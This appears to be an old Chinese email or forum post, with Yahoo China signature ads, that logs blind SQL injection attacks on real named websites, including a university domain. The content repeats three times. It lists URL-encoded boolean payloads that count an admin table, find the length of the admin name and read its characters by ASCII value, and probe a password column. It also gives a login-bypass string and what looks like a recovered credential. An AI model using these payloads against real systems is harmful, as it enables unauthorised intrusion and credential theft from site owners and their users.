有sql注入漏洞
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20count(*)%20from%20admin)>0
显示正常
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20count(*)%20from%20admin)>1
显示空白信息
说明
存在admin这张表而且 表中只有一条纪录
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>1
显示正常
admin表中存在字段adminname
而且 那条唯一的纪录的adminname字段的长度大于1
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>4
显示正常
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>5
显示空白信息
说明 adminname 的长度为5
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20asc(mid(name,5,1))%20from%20user)>105
显示正常
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20asc(mid(adminname,5,1))%20from%20admin)>106
显示bu正常
说明adminname的第五个字符的ascii码为106
即第五个字符为j
a' or 'a'='a
csr1348
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=208%20and%20 (select%20top%201%20len(name)%20from%20user)>1
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20 (select%20top%201%20len(name)%20from%20user)>4
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20 (select%20top%201%20asc(mid(name,5,1))%20from%20user)>10
http://www.gliet.edu.cn/yuanban/shownews.asp?newsid=636%20and%20 (select%20top%201%20asc(mid(pwd,8,1))%20from%20users)>1
=====
陆毅
_________________________________________________________
Do You Yahoo!?
150万曲MP3疯狂搜,带您闯入音乐殿堂
http://music.yisou.com/
美女明星应有尽有,搜遍美图、艳图和酷图
http://image.yisou.com
1G就是1000兆,雅虎电邮自助扩容!
http://cn.rd.yahoo.com/mail_cn/tag/1g/*http://cn.mail.yahoo.com/event/mail_1g/
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20count(*)%20from%20admin)>0
显示正常
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20count(*)%20from%20admin)>1
显示空白信息
说明
存在admin这张表而且 表中只有一条纪录
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>1
显示正常
admin表中存在字段adminname
而且 那条唯一的纪录的adminname字段的长度大于1
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>4
显示正常
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>5
显示空白信息
说明 adminname 的长度为5
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20asc(mid(name,5,1))%20from%20user)>105
显示正常
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20asc(mid(adminname,5,1))%20from%20admin)>106
显示bu正常
说明adminname的第五个字符的ascii码为106
即第五个字符为j
a' or 'a'='a
csr1348
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=208%20and%20 (select%20top%201%20len(name)%20from%20user)>1
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20 (select%20top%201%20len(name)%20from%20user)>4
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20 (select%20top%201%20asc(mid(name,5,1))%20from%20user)>10
http://www.gliet.edu.cn/yuanban/shownews.asp?newsid=636%20and%20 (select%20top%201%20asc(mid(pwd,8,1))%20from%20users)>1
=====
陆毅
_________________________________________________________
Do You Yahoo!?
150万曲MP3疯狂搜,带您闯入音乐殿堂
http://music.yisou.com/
美女明星应有尽有,搜遍美图、艳图和酷图
http://image.yisou.com
1G就是1000兆,雅虎电邮自助扩容!
http://cn.rd.yahoo.com/mail_cn/tag/1g/*http://cn.mail.yahoo.com/event/mail_1g/
有sql注入漏洞 http://www.27jj.com/news_info.asp?id=30%20and%20(select%20count(*)%20from%20admin)>0 显示正常 http://www.27jj.com/news_info.asp?id=30%20and%20(select%20count(*)%20from%20admin)>1 显示空白信息 说明 存在admin这张表而且 表中只有一条纪录 http://www.27jj.com/news_info.asp?id=30%20and%20(select%20top%201%20len(adminname)%20from%20admin)>1 显示正常 admin表中存在字段adminname 而且 那条唯一的纪录的adminname字段的长度大于1 http://www.27jj.com/news_info.asp?id=30%20and%20(select%20top%201%20len(adminname)%20from%20admin)>4 显示正常 http://www.27jj.com/news_info.asp?id=30%20and%20(select%20top%201%20len(adminname)%20from%20admin)>5 显示空白信息 说明 adminname 的长度为5 http://www.27jj.com/news_info.asp?id=30%20and%20(select%20top%201%20asc(mid(name,5,1))%20from%20user)>105 显示正常 http://www.27jj.com/news_info.asp?id=30%20and%20(select%20top%201%20asc(mid(adminname,5,1))%20from%20admin)>106 显示bu正常 说明adminname的第五个字符的ascii码为106 即第五个字符为j a' or 'a'='a csr1348 http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=208%20and%20(select%20top%201%20len(name)%20from%20user)>1 http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20(select%20top%201%20len(name)%20from%20user)>4 http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20(select%20top%201%20asc(mid(name,5,1))%20from%20user)>10 http://www.gliet.edu.cn/yuanban/shownews.asp?newsid=636%20and%20(select%20top%201%20asc(mid(pwd,8,1))%20from%20users)>1